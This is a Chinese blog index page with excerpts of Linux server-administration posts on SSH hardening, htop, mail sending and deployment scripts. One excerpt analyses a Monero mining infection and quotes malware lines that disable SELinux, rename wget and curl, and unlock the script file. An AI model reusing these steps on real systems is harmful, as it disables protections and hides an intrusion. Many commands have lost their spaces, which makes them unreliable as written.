服务器运维人员基本的服务器优化命令及相关参数意义
以下是一般公司运维部门进行服务器初始化后的服务器优化集合,认为比较有用,留着备用吧: #限定root用户不能通过ssh的登录方式 sudosed-i's/#PermitRootLoginyes/PermitRootLoginno/g'/etc/ssh/sshd_config #停用密码认证的登入方式,只允许密钥认证 sudosed-i's/#PubkeyAuthentication/PubkeyAuthentication/g'/etc/ssh/sshd_config #可以使用user/.ssh/key文件来验证 sudosed-i's/#AuthorizedKeysFile/AuthorizedKeysFile/g'/etc/ssh/sshd_config #不要这种GSSAPI认证方式,浪费时间 sudos...[>>…]
比top更好用-可查看全部进程及某个进程的线程的linux命令Htop
可以使用命令top-H-p<pid>可以查看线程,不过有一个更好用的命令htop,htop算是top的升级版,top只能查看当前屏的数据,htop可以让你在垂直和水平方向上滚动,从而看到运行的所有进程,以及他们完整的命令行。 htop是Linux系统中的一个互动的进程查看器,一个文本模式的应用程序(在控制台或者X终端中),需要ncurses。与Linux传统的top相比,htop在启动上比top更快,而且杀进程时不需要输入进程号,并且支持鼠标操作,支持颜色主题,总之htop更加人性化,centos...[>>…]
XMR恶意挖矿病毒攻击定时任务及js脚本的处理
之前我的阿里云服务器遭到XMR恶意挖矿病毒攻击,见文章https://www.04007.cn/article/562.html,今天有点时间就来准备看一下这个病毒shell文件shz.sh里面的具体内容,幸好看了,原来还有一个遗留病毒我没有解决。先看我下面列出的一些主要点: #!/bin/sh setenforce02>dev/null #第2行 echoSELINUX=desabled>/etc/sysconfig/selinux2>/dev/null #第3行 mv/usr/bin/wget/usr/bin/get #第15行 mv/usr/bin/curl/usr/bin/url #第16行 chattr-i/etc/shz.sh #第20行 #第35行 [[$cont=~"s...[>>…]
解决curl奇怪报错:bash: curl: command not found,curl: (2) Failed Initialization
服务器之前各shell脚本以及curl等东西运行的好好的,但这次中毒之后变得奇怪了,各种报错,执行curl,wget都提示命令不存在,wget方面我使用yum安装后又能正常。但yuminstallcurl安装也提示成功,但是安装成功后仍然是curl就是不行,通过下载一个版本的curl安装包编译安装成功,能查看Version,但就是执行curl时报错;curl:(2)Failedinitialization [root@04007~]#curl -bash:curl:commandnotfound #后通过wget下载安装包安装后,能查看到版本信息,但是curl报错curl:(2)Failedinitialization w...[>>…]
阿里云服务器发现挖矿程序病毒的解决处理
最近阿里云服务器给我发报警短信,提示服务器:进程异常行为-可疑Host访问行为,但因为只是一个自己玩玩的服务器,有时一尽快也没当回事,试着访问了服务器还都正常,后来甚至有报警:恶意进程(云查杀)-挖矿程序,这有一天有空就上来看看,一看问题大了,整个服务器的定时任务被改写了,成了乱码,检查一下其它的东西到还正常,不过打开网站发现突然很慢了,不错,是中毒了,门罗币(XMR)挖矿程序。报警截图如下:登录服务器后,首先我查看了一下服务器各个文件夹近几天改过的文件,一看...[>>…]
服务器lnmp环境自动化部署脚本
以前公司运维用来自动化服务器lnmp环境的shell脚本,这里没有mysql的,可能是我以前剪切掉了,mysql的看这篇文章吧:https://www.04007.cn/article/143.html整个里面的路径自己去完善一下,因为公司内用的是内网的资源路径,写在这里也没有用。在我的这个小站里搜索也都能搜索到下载路径。自动化部署脚本如下: #!/bin/bash mv/etc/yum.repos.d/CentOS-Base.repo/etc/yum.repos.d/CentOS-Base.repo.bak wget-O/etc/yum.repos.d/CentOS-Base.repohttp://mirrors.aliyun.com/repo/Centos-6.repo...[>>…]
linux下使用mail发送邮件的简单实现
在之前一篇文章 https://www.04007.cn/article/539.html探讨了邮件发送里MUA与MTA之间的联系,通过mail或者mailx命令调用MTA(postfix,exim甚至sendmail等)执行发送都是可行的方案,但在执行的时候会发现一个情况,那就是发出去的邮件,在收件箱里显示的发件人都是服务器的用户名@主机名,并且使用postfix和exim时这个还不一样。这是postfix发送时的发件人信息:发件人:root<root@iZ2eretjiwZ.localdomain>这是exim发送时的信息,这个未带后面的.localdomain发件人:root<@iZ...[>>…]
简单的mail发送邮件里面的更多东西-postfix-exim MTA试验
mail发送邮件应该是一个常用的东西,但是从简单的东西切入,也许你会有更多的收获。今天再看了看mail发邮件的东西,真的一个很小的知识点但要弄透不下功夫真的是不行的。先了解下面两个东西:邮件用户代理(MUA,MailUserAgent)邮件传送代理(MTA,MailTransportAgent) 还有一个MDA(邮件分发代理MailDeliverAgent)但一般我们接触不到吧,接触较多的都是MUA和MTA。所以MDA就不列在上面了。通俗的说MUA就是用户使用的客户端,而MTA则是真正发送邮件的发送进程,MUA...[>>…]
OpenSSH的sshd_config服务器配置文件各配置详细介绍
配置文件:/etc/ssh/sshd_config sshd(8)默认从/etc/ssh/sshd_config文件(或通过-f命令行选项指定的文件)读取配置信息。 配置文件是由"指令值"对组成的,每行一个。空行和以'#'开头的行都将被忽略。 如果值中含有空白符或者其他特殊符号,那么可以通过在两边加上双引号(")进行界定。 [注意]值是大小写敏感的,但指令是大小写无关的。 当前所有可以使用的配置指令如下: AcceptEnv 指定客户端发送的哪些环境变量将会被传递到会话环境中。[注意]只有SSH-2协议支持环境变量的传递。  ...[>>…]
linux批量文本文件内容替换功能以及vim的一些小功能点
1,linux下批量进行文件替换使用sed命令: #命令格式如下: #sed-i"s/oldstring/newstring/g"`grepoldstring-rldir` #命令示例如下: [root@123~]#grep-R'abcdefg'./*--color ./z1.txt:abcdefg ./z2.txt:abcdefg [root@123~]#grep-lRabcdefg./*--color ./z1.txt ./z2.txt [root@123~]#catz1.txt aaaa bbbb abcdefg 123456 aaabbbccc [root@123~]#catz2.txt aaaa123 bbbbtest abcdefg 1234567890 aaabbbccc [root@123~]#sed-i's/abcdefg/--hello--/g'`grep-lRabcdefg./*` [root@123~]#catz1.txt aaaa bbbb --hello-- 1...[>>…]